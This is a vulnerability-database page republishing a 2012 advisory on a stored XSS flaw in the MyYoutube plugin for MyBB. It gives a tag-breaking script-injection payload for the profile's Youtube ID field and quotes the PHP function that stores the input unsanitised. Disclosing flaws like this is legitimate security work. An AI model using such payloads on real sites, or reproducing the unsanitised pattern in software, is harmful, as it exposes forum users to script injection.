Lucene search
K

MyBB MyYoutube Cross Site Scripting

🗓️ 18 Dec 2012 00:00:00Reported by limb0Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

MyYoutube MyBB Stored XSS vulnerability reported on 17.12.2012. Allows injection of malicious code through Youtube ID in user profiles

Code
`# Exploit Title: MyYoutube MyBB Stored XSS  
# Date: 17.12.2012  
# Exploit Author: limb0  
# Vendor Homepage: http://www.mybb-es.com/  
# Software Link: http://mods.mybb.com/view/myyoutube  
# Version: 1.0  
# Category:Web Security  
# Tested on: Linux  
  
+-----------------------------------------------------+  
Stored-XSS  
  
Installation Instructions:  
1.Download and Activate the Plugin  
2.Go to Usercp >> Edit Profile >> Youtube ID:  
3.Inject your code: "></embed></object><script>alert("Youtube XSS")</script>  
4.Visit your profile and voila.  
  
Proof:http://postimage.org/image/lnnmc80rp/  
+------------------------------------------------------+  
Vulnerable lines:  
function youtube_update($ytb)  
{  
global $mybb;  
if(isset($mybb->input['ytb']))  
{  
$ytb->user_update_data['ytb'] = $mybb->input['ytb'];  
}  
}  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Dec 2012 00:00Current
7.4High risk
Vulners AI Score7.4
30